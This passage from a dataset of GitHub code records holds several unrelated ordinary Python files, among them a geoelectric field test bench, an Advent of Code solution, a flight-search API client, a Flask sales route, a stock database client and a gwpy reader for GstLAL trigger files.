player.\n#If player is O, I'm the second player.\nplayer = raw_input()\n\n#Read the board now. The board is a 3x3 array filled with X, O or _.\nboard = []\nfor i in xrange(0, 3):\n board.append(raw_input())\n\nnextMove(player,board)","repo_name":"thanpolas/hackerrank","sub_path":"01.tictactoe/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9016127370","text":"import ElectricFieldPredictor\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy.fft import fft, fftfreq\n\n\"\"\" This code uses the following paper to validate ElectricFieldCalculator.py\n\n Documentation: D. H. Boteler, R. J. Pirjola and L. Marti, \"Analytic Calculation of \n Geoelectric Fields Due to Geomagnetic Disturbances: A Test Case,\" \n in IEEE Access, vol. 7, pp. 147029-147037, 2019, doi: 10.1109/ACCESS.2019.2945530.\n\"\"\"\n\nquebec_res = pd.read_csv('Quebec_1D_model.csv') \ntime = np.arange(0,43200,0.5)\n\nmu0 = 4 * np.pi * 10**(-7)\n\n\n\n# the data in the following arrays are taken from the tables in the documentation above\nA_m = [200, 90, 30, 17, 8, 3.5, 1]\nphi_m = np.array([10, 20, 30, 40, 50, 60, 70], dtype=float)*np.pi/180.0\nf_m = [0.00009259, 0.00020833, 0.00047619, 0.00111111, 0.00238095, 0.00555555, 0.025]\nB = np.zeros(time.size)\n\nE_m = np.array([43.76735, 40.32326, 26.04161, 26.16634, 20.74819, 16.31864, 9.60469])*10**(-3)\nphi_m2 = np.array([87.15, 93.76, 97.19, 102.08, 110.58, 114.97, 114.38])*np.pi/180.0\n\nE = np.zeros(time.size)\nk = np.zeros(7)\nk_phi = np.zeros(7)\n\n\n# calculate the earth response using the ElectricFieldCalculator and compare with the results in the paper\nfor i in range(7):\n k_i = ElectricFieldPredictor.k_f(quebec_res, f_m[i])\n k[i] = abs(k_i) * 10**(-3)\n k_phi[i] = np.arctan2(k_i.imag,k_i.real) * 180/np.pi\n\nK_mag_expected = [0.2188, 0.4480, 0.8681, 1.5392, 2.5935, 4.6625, 9.6047]\nK_phase_expected = [77.15, 73.76, 67.17, 62.08, 60.58, 54.97, 44.38]\n\n# test Earth transfer function\nnum_failed_mag = 0\nnum_failed_phase = 0\nfor i in range(7):\n print(\"F, K_mag_expected, k_actual: \",f_m[i], K_mag_expected[i], k[i])\n print(\"F, K_phase_expected, k_actual: \",f_m[i], K_phase_expected[i], k_phi[i])\n if k[i] < K_mag_expected[i] - K_mag_expected[i]*0.01 or k[i] > K_mag_expected[i] + K_mag_expected[i]*0.01:\n num_failed_mag += 1\n print(f'Earth Response magnitude Incorrect! Expected: {K_mag_expected[i]}, got {k[i]}')\n if k_phi[i] < K_phase_expected[i] - K_phase_expected[i]*0.01 or k_phi[i] > K_phase_expected[i] + K_phase_expected[i]*0.01:\n num_failed_phase += 1\n print(f'Earth Response phase Incorrect! Expected: {K_phase_expected[i]}, got {k_phi[i]}')\n\nif num_failed_mag == 0:\n print(\"All Earth Response magnitude tests pass\")\nelse:\n print(f'{num_failed_mag} Earth response magnitude tests failed')\n\nif num_failed_phase == 0:\n print(\"All Earth Response phase tests pass\")\nelse:\n print(f'{num_failed_phase} Earth response phase tests failed')\n\n# generate synthetic electric and magnetic fields in the paper\nfor t in range(time.size):\n for m in range(7):\n B[t] += A_m[m] * np.sin(2*np.pi*f_m[m]*time[t] + phi_m[m])\n E[t] += E_m[m] * np.sin(2*np.pi*f_m[m]*time[t] + phi_m2[m])\n\n# calculate e field from the synthetic magnetic field and compare with the synthetic magnetic field\nmy_E_field = ElectricFieldPredictor.B_to_E(quebec_res, B, time, 1)\n\nplt.subplot(3,1,1)\nplt.plot(time, B, label='Magnetic Field Test Data')\nplt.legend()\nplt.ylabel('Magnetic Field (nT)')\nplt.xlabel('time (s)')\n\nplt.subplot(3,1,2)\nplt.plot(time, E, label='Electric Field Comparison Data')\nplt.legend()\nplt.ylabel('Electric Field (V/km)')\nplt.xlabel('time (s)')\nplt.subplot(3,1,3)\nplt.plot(time, my_E_field, label='Electric Field Calculated Data')\n\nplt.ylabel('Electric Field (V/km)')\nplt.xlabel('time (s)')\nplt.legend()\nplt.subplots_adjust(left=0.15,\n bottom=0.1,\n right=0.9,\n top=0.95,\n hspace=0.6)\nplt.show()\n\n# calculate correlation coefficient of the actual and expected electric fields\nrho = np.cov(E,my_E_field)[0][1]/np.sqrt(np.var(E)*np.var(my_E_field))\nprint(\"Electric Field Correlation Coefficient\", rho)\n\n\n","repo_name":"scriptedfire/blueeye1_capstone","sub_path":"Application/Electric_field_calculator_test_bench.py","file_name":"Electric_field_calculator_test_bench.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30324591310","text":"from pathlib import Path\nimport functions\n\ndir = Path(__file__).parent.resolve()\n\nfilename = dir / \"input.txt\"\n\n\ndef step_head(curr, dir):\n x, y = curr\n if dir == \"R\":\n return (x + 1, y)\n if dir == \"L\":\n return (x - 1, y)\n if dir == \"U\":\n return (x, y + 1)\n\n # down\n return (x, y - 1)\n\n\ndef step_tail(head, tail):\n xdelta = head[0] - tail[0]\n ydelta = head[1] - tail[1]\n\n if abs(xdelta) < 2 and abs(ydelta) < 2:\n # dont move\n return tail\n\n if xdelta == 0:\n # move y\n return (tail[0], tail[1] + ydelta / abs(ydelta))\n\n if ydelta == 0:\n # move x\n return (tail[0] + xdelta / abs(xdelta), tail[1])\n\n # move diagonally\n return (tail[0] + xdelta / abs(xdelta), tail[1] + ydelta / abs(ydelta))\n\n\ndef task1():\n movements = functions.read_file_to_list(filename, str)\n\n visited = set()\n\n head = tail = (0, 0)\n for movement in movements:\n dir, moves = movement.split(\" \")\n\n for _ in range(int(moves)):\n head = step_head(head, dir)\n tail = step_tail(head, tail)\n\n visited.add(tail)\n\n answer = len(visited)\n\n print(\"\\tAnswer: \", answer)\n\n\ndef task2():\n movements = functions.read_file_to_list(filename, str)\n\n visited = set()\n\n knots = {nr: (0, 0) for nr in range(0, 10)}\n\n for movement in movements:\n dir, moves = movement.split(\" \")\n\n for _ in range(int(moves)):\n for knot in knots:\n if knot == 0:\n knots[knot] = step_head(knots[knot], dir)\n else:\n knots[knot] = step_tail(knots[knot - 1], knots[knot])\n\n if knot == 9:\n visited.add(knots[knot])\n\n answer = len(visited)\n\n print(\"\\tAnswer: \", answer)\n\n\nif __name__ == \"__main__\":\n print(\"========== Task 1 ==========\")\n task1()\n print(\"============================\\n\")\n\n print(\"========== Task 2 ==========\")\n task2()\n print(\"============================\")\n","repo_name":"jonajo15/Advent-of-Code-22","sub_path":"src/days/9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27779498830","text":"import requests\n\n\nclass FlightSearch:\n\n\tdef __init__(self, api_key):\n\t\tself.api_key = api_key,\n\t\tself.headers = {\"apikey\": api_key}\n\t\tself.api_endpoint = \"https://tequila-api.kiwi.com/v2/search\"\n\t\tself.flight_data = None\n\n\tdef get_flight_info(self, fly_from, fly_to, date_from, date_to, return_from, return_to, max_stopovers):\n\t\t\"\"\"\n\t\t:param str fly_from: city IATA code\n\t\t:param str fly_to: city IATA code\n\t\t:param str date_from: start date range (e.g. \"25/03/2000\")\n\t\t:param str date_to: end date range (e.g. 12/05/2001)\n\t\t:param str return_from: start date range for return (e.g. 25/07/2001)\n\t\t:param str return_to: end date range for return (e.g. 25/09/2001)\n\t\t:param str curr: currency for flight fare (e.g. \"USD\")\n\t\t:param int max_stopovers: number of stopovers (e.g. 2)\n\t\t:return: a list containing available flights\n\t\t\"\"\"\n\t\tdata = {\n\t\t\t\"fly_from\": fly_from,\n\t\t\t\"fly_to\": fly_to,\n\t\t\t\"date_from\": date_from,\n\t\t\t\"date_to\": date_to,\n\t\t\t\"return_from\": return_from,\n\t\t\t\"return_to\": return_to,\n\t\t\t\"curr\": \"USD\",\n\t\t\t\"max_stopovers\": max_stopovers,\n\n\t\t}\n\n\t\tresponse = requests.get(url=self.api_endpoint, params=data, headers=self.headers)\n\t\tself.flight_data = response.json()\n\t\treturn self.flight_data\n\n\tdef find_cheapest_flights(\n\t\t\tself, fly_from, fly_to, date_from, date_to, return_from, return_to, max_stopovers):\n\t\t\"\"\"\n\t\t:param str fly_from: city IATA code\n\t\t:param str fly_to: city IATA code\n\t\t:param str date_from: start date range (e.g. \"25/03/2000\")\n\t\t:param str date_to: end date range (e.g. 12/05/2001)\n\t\t:param str return_from: start date range for return (e.g. 25/07/2001)\n\t\t:param str return_to: end date range for return (e.g. 25/09/2001)\n\t\t:param int max_stopovers: number of stopovers (e.g. 2)\n\t\t:return: a specified number of cheapest flights available\n\t\t\"\"\"\n\t\tself.get_flight_info(fly_from, fly_to, date_from, date_to, return_from, return_to, max_stopovers)\n\t\tfares_dict = []\n\t\tfor flight in self.flight_data['data']:\n\t\t\tflight_info = {\n\t\t\t\t\"carrier\": flight['airlines'][0],\n\t\t\t\t\"departure\": flight['flyFrom'],\n\t\t\t\t\"arrival\": flight[\"flyTo\"],\n\t\t\t\t\"price\": flight['fare']['adults'],\n\t\t\t\t\"departure_date_time\": flight['local_departure'],\n\t\t\t\t\"arrival_date_time\": flight['local_arrival']\n\t\t\t}\n\t\t\tfares_dict.append(flight_info)\n\n\t\t# Sort the list of dictionaries by fare in ascending order\n\t\tsorted_fares = sorted(fares_dict, key=lambda x: x['price'])\n\n\t\treturn sorted_fares[:1]\n\n\n","repo_name":"olabanjialadejana/FlightTracker","sub_path":"flight_search.py","file_name":"flight_search.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4604449432","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for, session\nfrom utils.db import db\nfrom models.sale import Sale\nfrom models.product_sale import ProductSale\nfrom sqlalchemy import text\nfrom uuid import uuid4\n\nseller = Blueprint(\"seller\", __name__, static_folder=\"static\", template_folder=\"templates\")\n\nclass DataError(Exception):\n pass\n\n@seller.before_request\ndef before_request():\n if not \"user_name\" in session or session[\"user_role\"] != 1:\n return redirect(url_for(\"login\"))\n \n@seller.route('/')\ndef home():\n return render_template(\"seller.jinja\")\n\n@seller.route('/add_sale')\ndef add_sale():\n return render_template(\"add_sale.jinja\")\n\n@seller.route('/process_sale', methods=['POST'])\ndef process_sale():\n str_ids = request.form.getlist(\"product_id[]\")\n str_amounts = request.form.getlist(\"amount[]\")\n amounts: list[int] = []\n ids: list[int] = []\n client_id = request.form.get(\"client_id\")\n\n try:\n if client_id is None or client_id.isspace() or not client_id.isalnum():\n raise DataError(\"ID del cliente invalido\")\n\n if len(str_ids) == 0:\n raise DataError(\"No se ingresaron productos.\")\n\n # Check for valid values\n for product_id, amount in zip(str_ids, str_amounts):\n if not product_id.isnumeric():\n raise DataError(\"El ID de un producto no puede ser vacio.\")\n \n elif not amount.isnumeric():\n raise DataError(\"Las cantidades deben ser enteros positivos mayores a 0.\")\n \n amounts.append(int(amount))\n ids.append(int(product_id))\n \n # Get all products with the user provided IDs\n values = ','.join(str_ids)\n query = text(f'SELECT * FROM inventory.product WHERE product_id IN ({values})')\n result = db.session.execute(query).all()\n set_ids = set([row.product_id for row in result])\n\n # If missing IDS, an invalid ID was inserted\n if len(result) != len(ids):\n for i in ids:\n if i not in set_ids:\n raise DataError(f\"ID de producto invalido: {i}\")\n elif ids.count(i) > 1:\n raise DataError(f\"ID de producto repetido: {i}\")\n\n # tuple (id, amount)\n form_data = list(zip(ids, amounts))\n form_data.sort(key=lambda x: x[0])\n\n # Calculate sale price and check for valid amount\n total_price = 0\n sale_products: list[ProductSale] = []\n sale_id = uuid4()\n for row, data in zip(result, form_data):\n if row.product_amount < data[1]:\n raise DataError(f\"La cantidad comprada de {row.product_name} excede el inventario.\\\n Cantidad Disponible: ({row.product_amount}).\")\n \n total_price += row.product_price * data[1]\n sale_products.append(ProductSale(sale_id=sale_id, product_id=row.product_id, amount=data[1]))\n\n sale = Sale(sale_id, total_price, session[\"user_id\"], client_id)\n db.session.add(sale)\n db.session.commit()\n db.session.add_all(sale_products)\n db.session.commit()\n \n flash(\"Venta exitosa\")\n\n except DataError as e:\n flash(str(e))\n\n except Exception as e:\n flash(\"Ha ocurrido un error inesperado.\")\n print(e)\n\n return redirect(url_for(\"seller.add_sale\"))","repo_name":"Buitragox/point-of-sale","sub_path":"routes/seller.py","file_name":"seller.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28137709924","text":"import logging\nimport time\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy.orm import sessionmaker\nfrom autotrader.datasource.database.stock_schema import BASE\n\n\nclass StockDataBase:\n \"\"\"\n Autotrader database client\n \"\"\"\n def __init__(self, sql_config, logger: logging.Logger):\n self.engine = None\n self.session = None\n self.db_session = None\n self.sessions = {}\n self.__sessions = {}\n self.logger = logger\n self.sql_config = sql_config\n\n def connect(self, database=None):\n \"\"\"\n Connect to the database\n :param database: name of database to connect\n :return: nothing\n \"\"\"\n if database is None:\n database = self.sql_config['database']\n if not self.session:\n url = 'mysql+pymysql://{}:{}@{}:{}/{}'.format(self.sql_config['user'],\n self.sql_config['pw'],\n self.sql_config['address'],\n self.sql_config['port'],\n database)\n # MySQL features an automatic connection close behavior,\n # for connections that have been idle for eight hours or more.\n # To circumvent having this issue, use the pool_recycle\n # option which controls the maximum age of any connection:\n self.engine = create_engine(url, pool_recycle=3600)\n self.db_session = sessionmaker(bind=self.engine)\n self.session = self.db_session()\n\n def is_connected(self):\n \"\"\"\n Checks if database connection is established\n :return: true if connection to database is established otherwise false\n \"\"\"\n return self.session is not None\n\n def create(self, database=None):\n \"\"\"\n Creates a database by given name\n :param url: sql url\n :param database: database name to create\n :return:\n \"\"\"\n if database is None:\n database = self.sql_config['database']\n\n url = 'mysql+pymysql://{}:{}@{}:{}'.format(self.sql_config['user'],\n self.sql_config['pw'],\n self.sql_config['address'],\n self.sql_config['port'])\n # MySQL features an automatic connection close behavior,\n # for connections that have been idle for eight hours or more.\n # To circumvent having this issue, use the pool_recycle\n # option which controls the maximum age of any connection:\n self.engine = create_engine(url, pool_recycle=3600)\n if self.engine and database:\n # create db if not exist\n try:\n self.engine.execute(\"CREATE DATABASE IF NOT EXISTS {}\".format(database))\n except SQLAlchemyError:\n self.logger.exception(\"Error during create:\")\n return False\n self.engine.execute(\"USE {}\".format(database))\n BASE.metadata.create_all(self.engine)\n return True\n\n def delete(self, db_session_object):\n if db_session_object in self.session.new:\n self.session.expunge(db_session_object)\n else:\n self.session.delete(db_session_object)\n\n def commit(self, error_counter=0):\n \"\"\"\n\n :return:\n \"\"\"\n try:\n self.session.commit()\n return\n except BrokenPipeError or SQLAlchemyError:\n self.logger.warning(\"Error during commit error count {}.\".format(error_counter))\n if error_counter > 5:\n error_counter += 1\n time.sleep(100)\n self.session.connect()\n self.commit(error_counter)\n return\n raise RuntimeError(\"Commit was not successful\")\n\n def close(self):\n \"\"\"\n Closes current session\n :return:\n \"\"\"\n if self.session:\n self.session.close()\n\n def drop(self, database=None):\n \"\"\"\n Drop an existing database\n :param database: name of database\n :return:\n \"\"\"\n if database is None:\n database = self.sql_config['database']\n url = 'mysql+pymysql://{}:{}@{}:{}'.format(self.sql_config['user'],\n self.sql_config['pw'],\n self.sql_config['address'],\n self.sql_config['port'])\n # MySQL features an automatic connection close behavior,\n # for connections that have been idle for eight hours or more.\n # To circumvent having this issue, use the pool_recycle\n # option which controls the maximum age of any connection:\n self.engine = create_engine(url, pool_recycle=3600)\n if self.engine and database:\n # create db if not exist\n try:\n sql_statement = \"DROP DATABASE IF EXISTS {}\".format(database)\n self.engine.execute(sql_statement)\n except SQLAlchemyError:\n self.logger.exception(\"Error during drop:\")\n","repo_name":"SlashGordon/autotrader","sub_path":"autotrader/datasource/database/stock_database.py","file_name":"stock_database.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20423766469","text":"from django.core.exceptions import ObjectDoesNotExist\n\nfrom server.middleware import JSONException\n\n\nWAITING_FOR_PLAYERS = 1\nRUNNING = 2\nOVER = 3\n\nGAME_STATUSES = (\n (WAITING_FOR_PLAYERS, u\"Waiting for players\"),\n (RUNNING, u\"Game running now\"),\n (OVER, u\"Game over\"),\n)\n\n\nPLAYING = 1\nQUIT = 2\nLOST = 3\nWON = 4\n\nPLAYER_STATUSES = (\n (PLAYING, \"Playing\"),\n (QUIT, \"Quit\"),\n (LOST, \"Lost\"),\n (WON, \"Won\"),\n)\n\n\ndef split_ints(string):\n if not string:\n return []\n else:\n return map(int, string.split(','))\n\n\ndef jsonified_exceptions(fn):\n def wrapped(*args, **kwargs):\n try:\n return fn(*args, **kwargs)\n except ObjectDoesNotExist as e:\n # Raises an exception which will be caught by the\n # JSONExceptionMiddleware and sent as the response\n raise JSONException(str(e), 404)\n # except Exception as e:\n # raise JSONException(str(e), 500)\n return wrapped\n","repo_name":"jamesandres/FiveDice","sub_path":"server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32219432608","text":"\"\"\"\nBenchmark an arbitrary console command by executing it a certain number of times.\n\nExample: python benchmark.py python prodigy/cli.py --engine ginac main pgfexamples/inference/piranha.pgcl\n\"\"\"\n\nimport subprocess\nimport sys\n\nfrom prodigy.util.color import Style\n\ncount = 20\ntimeout = 90\n\ntimes = []\nfor i in range(count):\n print(f\"\\ron iteration {i + 1}/{count}...\", end=\"\")\n # Choose timing behavior by commenting out\n psi_timings = True\n # psi_timings = False\n if psi_timings:\n result = subprocess.check_output(sys.argv[1:], timeout=timeout)\n if \"seconds\" not in result.decode().splitlines()[-2]:\n times.append(float(result.decode().splitlines()[-3].split()[0]))\n else:\n times.append(float(result.decode().splitlines()[-2].split()[0]))\n else:\n result = subprocess.check_output(sys.argv[1:], timeout=timeout)\n times.append(float(result.decode().splitlines()[-1].split()[2]))\nprint(\"\\r\", end=\"\")\n\nprint(f\"{Style.OKCYAN}min:{Style.RESET} {min(times):.3f} seconds\")\nprint(f\"{Style.OKCYAN}max:{Style.RESET} {max(times):.3f} seconds\")\nprint(f\"{Style.OKCYAN}average:{Style.RESET} {(sum(times) / count):.3f} seconds\")\n\nprint()\nprint(f\"{Style.OKCYAN}Output:{Style.RESET}\\n{result.decode()}\")\n","repo_name":"LKlinke/Prodigy","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17773113182","text":"\nimport numpy as np\nimport nltk\nimport xml.etree.ElementTree as ET\nimport os\nfrom bs4 import BeautifulSoup\nimport enchant\nimport csv\nimport inflect\nimport shutil\n\n\n\ndef tag_filtering(tag_store_path, image_path):\n# 1)Remove all tags that contain non-English words, numerical terms, or symbols\n# 2)Remove all tags with less than or equal to 2 letters\n# 3)Replace plural tags with equivalent singular tags\n# 4)Remove images with less than 4 tags \n# 5)Assign indices to all unique tags \n\n# Store a list of images that pass all these filters and their corresponding tags\n\n\n d = enchant.Dict(\"en_US\")\n f = open(tag_store_path, 'w', encoding='UTF8')\n p_checker = inflect.engine()\n writer = csv.writer(f)\n Root = image_path\n feature_idx = ['Feature Index']\n\n\n for root, dirs, files in os.walk(Root, topdown=True):\n for name in files:\n temp = []\n temp.append(name)\n print(os.path.join(root, name))\n infile = open(os.path.join(root, name), \"r\",encoding=\"utf8\")\n contents = infile.read()\n soup = BeautifulSoup(contents,\"html.parser\")\n titles = soup.find_all('name')\n\n for title in titles:\n if title.get_text():\n if d.check(title.get_text()):\n a = str(title.get_text())\n if a.isalpha() and len(a)>2:\n temp_a = p_checker.singular_noun(a)\n if temp_a != False:\n a = temp_a\n ans = nltk.pos_tag([a])\n val = ans[0][1]\n if(val == 'NN' or val == 'NNS' or val == 'NNPS' or val == 'NNP'):\n \n if a not in temp:\n temp.append(a)\n infile.close()\n if (len(temp)>4):\n writer.writerow(temp)\n for i in range(1,len(temp)):\n if temp[i] not in feature_idx:\n feature_idx.append(temp[i])\n writer.writerow(feature_idx)\n\n\n f.close()\n\n\ndef tag_to_binary(tag_idx_path, string_tag_path, binary_tag_store_path):\n\n # Convert string tags to binary form based on tag index\n \n feature_idx_path = tag_idx_path\n feature_idx = []\n with open(feature_idx_path) as f:\n for row in f:\n \n feature_idx.append (row.split(','))\n\n\n feature_idx[0][0]= 'light'\n feature_idx[0][-1] = 'contemplation'\n print(feature_idx[0])\n feature_idx = feature_idx[0]\n print(len(feature_idx))\n f.close()\n\n counter = 0\n binary_feature = None\n string_features = np.load(string_tag_path,allow_pickle=True)\n for ele in string_features:\n \n binary_row = np.zeros((1,len(feature_idx)))\n for i in ele:\n idx = feature_idx.index(i)\n binary_row[0,idx] = 1\n \n if counter==0:\n binary_feature = binary_row\n\n else:\n\n binary_feature = np.concatenate((binary_feature,binary_row),axis=0)\n\n counter +=1\n print(binary_feature.shape)\n \n np.save(binary_tag_store_path, binary_feature)\n\n\n\ndef move_rename(Root, Dest_path):\n\n # Uncomment to rename all files\n count = 0\n for root, dirs, files in os.walk(Root, topdown=True):\n \n for name in files:\n print(os.path.join(root, name))\n curr_name = os.path.join(root, name)\n new_name = os.path.join(root, str(count)+name)\n os.rename(curr_name, new_name)\n count += 1\n\n\n # move all files in subfolders into one folder\n for root, dirs, files in os.walk(Root, topdown=True):\n\n for name in files:\n print(os.path.join(root, name))\n shutil.copyfile(os.path.join(root, name), os.path.join(Dest_path, name))\n\n\n\n","repo_name":"LYM98/545-Final-Project","sub_path":"LYM_All_Code/Final_Version_Data_Processing_Labelme.py","file_name":"Final_Version_Data_Processing_Labelme.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7223029863","text":"import socket\n\ndef main():\n mensaje = \"\"\n print('Cliente 1.0')\n host, port = 'localhost', 8050\n sock = socket.socket()\n sock.connect((host, port))\n while mensaje != 'salir':\n print('Escribe un mensaje o salir para terminar conexion')\n mensaje = input('Usted dice: ')\n sock.send(mensaje.encode())\n sock.close()\n\nmain()\n","repo_name":"Regnier96/EjerciciosPython3_Erick","sub_path":"Ejercicios/E5/ClienteTCP_Mul.py","file_name":"ClienteTCP_Mul.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24268217628","text":"# Python 3.7\n# For the course Stochastic Calculus, Fall semester 2019, Courant Institute, NYU\n# Author: course instructor, Jonathan Goodman\n# https://www.math.nyu.edu/faculty/goodman/teaching/StochCalc2019/StochCalc.html\n\n# filename: IntegrationDemo.py\n# For assignment 1.\n\n# Compute the integral in assignment 1 numerically\n\nimport numpy as np # numerical computing library\n\nprint(\"Python file IntegrationDemo.py\")\nprint(\"Compute an integral\")\n\n# Z = integral from 0 to infinite r^{n-1}e^{-r^2/2} dr\n\nn = 4 # dimension of the space\nrMax = 10. + n # integrate to rMax instead of infinity.\n # write 10. instead of 10 so it will be floating point\nnPts = 1000 + 10*n*n # number of points for integration, use a lot\ndr = rMax/(nPts-1) # width of an integration cell.\n # it's (nPts-1) because if nPts = 3 then there are 2 cells\n\nsum = 0.\nfor r in ( np.linspace(0, rMax, nPts)):\n sum += np.power(r,(n-1))*np.exp(-r*r/2)\nZ = dr*sum\n\noutput = \"integral for n = {0:3d} is Z = {1:12.6e}\".format(n, Z)\nprint(output)\n","repo_name":"yifanlee1128/PythonProject_Coursework_StoCal","sub_path":"assignment1/IntegrationDemo.py","file_name":"IntegrationDemo.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13041960013","text":"import re\nfrom os.path import basename\n\nfrom astropy.table import join\n\nfrom ...io.registry import (register_reader, register_identifier)\nfrom ...io.ligolw import is_ligolw\nfrom .ligolw import read_table\nfrom .. import EventTable\nfrom .pycbc import get_mchirp\n\n__author__ = 'Derk Davis '\n__credits__ = 'Patrick Godwin '\n\nGSTLAL_FORMAT = 'ligolw.gstlal'\nGSTLAL_SNGL_FORMAT = 'ligolw.gstlal.sngl'\nGSTLAL_COINC_FORMAT = 'ligolw.gstlal.coinc'\n\nGSTLAL_FILENAME = re.compile('([A-Z][0-9])+-LLOID-[0-9.]+-[0-9.]+.xml.gz')\n\n\n# singles format\ndef read_gstlal_sngl(source, **kwargs):\n \"\"\"Read a `sngl_inspiral` table from one or more GstLAL LIGO_LW XML files\n\n source : `file`, `str`, :class:`~ligo.lw.ligolw.Document`, `list`\n one or more open files, file paths, or LIGO_LW `Document` objects\n\n **kwargs\n keyword arguments for the read, or conversion functions\n\n See also\n --------\n gwpy.io.ligolw.read_table\n for details of keyword arguments for the read operation\n gwpy.table.io.ligolw.to_astropy_table\n for details of keyword arguments for the conversion operation\n \"\"\"\n from ligo.lw import lsctables\n extra_cols = []\n derived_cols = []\n val_col = lsctables.TableByName['sngl_inspiral'].validcolumns\n if 'columns' in kwargs:\n for name in kwargs['columns'].copy():\n if name in GET_COLUMN:\n derived_cols.append(name)\n kwargs['columns'].remove(name)\n required_cols = GET_COLUMN_EXTRA[name]\n missing_cols = [c for c in required_cols\n if c not in kwargs['columns']]\n for r_col in missing_cols:\n kwargs['columns'].append(r_col)\n extra_cols.append(r_col)\n elif name not in val_col:\n name_list = list(val_col.keys())+list(GET_COLUMN.keys())\n raise ValueError(f\"'{name}' is not a valid column name. \"\n f\"Valid column names: {name_list}\")\n events = read_table(source, tablename='sngl_inspiral', **kwargs)\n for col_name in derived_cols:\n col_data = GET_COLUMN[col_name](events)\n events.add_column(col_data, name=col_name)\n for col_name in extra_cols:\n events.remove_column(col_name)\n return events\n\n\n# coinc format\ndef read_gstlal_coinc(source, **kwargs):\n \"\"\"Read a `Table` containing coincident event information\n from one or more GstLAL LIGO_LW XML files\n\n source : `file`, `str`, :class:`~ligo.lw.ligolw.Document`, `list`\n one or more open files, file paths, or LIGO_LW `Document` objects\n\n **kwargs\n keyword arguments for the read, or conversion functions\n\n See also\n --------\n gwpy.io.ligolw.read_table\n for details of keyword arguments for the read operation\n gwpy.table.io.ligolw.to_astropy_table\n for details of keyword arguments for the conversion operation\n \"\"\"\n from ligo.lw import lsctables\n extra_cols = []\n if 'columns' in kwargs:\n columns = kwargs['columns']\n kwargs.pop('columns')\n val_col_inspiral = lsctables.TableByName['coinc_inspiral'].validcolumns\n val_col_event = lsctables.TableByName['coinc_event'].validcolumns\n for name in columns:\n if (name not in val_col_inspiral) and (name not in val_col_event):\n name_list = list(val_col_inspiral.keys()) + \\\n list(val_col_event.keys())\n raise ValueError(f\"'{name}' is not a valid column name. \"\n f\"Valid column names: {name_list}\")\n if 'coinc_event_id' not in columns:\n columns.append('coinc_event_id')\n extra_cols.append('coinc_event_id')\n inspiral_cols = [col for col in columns if col in val_col_inspiral]\n event_cols = [col for col in columns if col in val_col_event]\n inspiral_cols.append('coinc_event_id')\n coinc_inspiral = read_table(source, tablename='coinc_inspiral',\n columns=inspiral_cols, **kwargs)\n coinc_event = read_table(source, tablename='coinc_event',\n columns=event_cols, **kwargs)\n else:\n coinc_inspiral = read_table(source, tablename='coinc_inspiral',\n **kwargs)\n coinc_event = read_table(source, tablename='coinc_event', **kwargs)\n events = join(coinc_inspiral, coinc_event, keys=\"coinc_event_id\",\n metadata_conflicts='silent')\n events.meta['tablename'] = 'gstlal_coinc_inspiral'\n for col_name in extra_cols:\n events.remove_column(col_name)\n return events\n\n\n# combined format\ndef read_gstlal(source, triggers='sngl', **kwargs):\n \"\"\"Read a `Table` from one or more GstLAL LIGO_LW XML files\n\n source : `file`, `str`, :class:`~ligo.lw.ligolw.Document`, `list`\n one or more open files, file paths, or LIGO_LW `Document` objects\n\n triggers : `str`, optional\n the `Name` of the relevant `Table` to read, if not given a table will\n be returned if only one exists in the document(s).\n 'sngl' for single-detector trigger information,\n 'coinc' for coincident trigger information\n\n **kwargs\n keyword arguments for the read, or conversion functions\n\n See also\n --------\n gwpy.io.ligolw.read_table\n for details of keyword arguments for the read operation\n gwpy.table.io.ligolw.to_astropy_table\n for details of keyword arguments for the conversion operation\n \"\"\"\n\n if triggers == 'sngl':\n return read_gstlal_sngl(source, **kwargs)\n if triggers == 'coinc':\n return read_gstlal_coinc(source, **kwargs)\n else:\n raise ValueError(\"The 'triggers' argument must be 'sngl' or 'coinc'\")\n\n\ndef identify_gstlal(origin, filepath, fileobj, *args, **kwargs):\n \"\"\"Identify a GstLAL file as a ligolw file with the correct name\n \"\"\"\n if is_ligolw(origin, filepath, fileobj, *args, **kwargs) and (\n filepath is not None\n and GSTLAL_FILENAME.match(basename(filepath))):\n return True\n return False\n\n\n# registers for unified I/O\nregister_identifier(GSTLAL_FORMAT, EventTable, identify_gstlal)\nregister_reader(GSTLAL_SNGL_FORMAT, EventTable, read_gstlal_sngl)\nregister_reader(GSTLAL_COINC_FORMAT, EventTable, read_gstlal_coinc)\nregister_reader(GSTLAL_FORMAT, EventTable, read_gstlal)\n\n# -- processed columns --------------------------------------------------------\n#\n# Here we define methods required to build commonly desired columns that\n# are just a combination of the basic columns.\n#\n# Each method should take in a 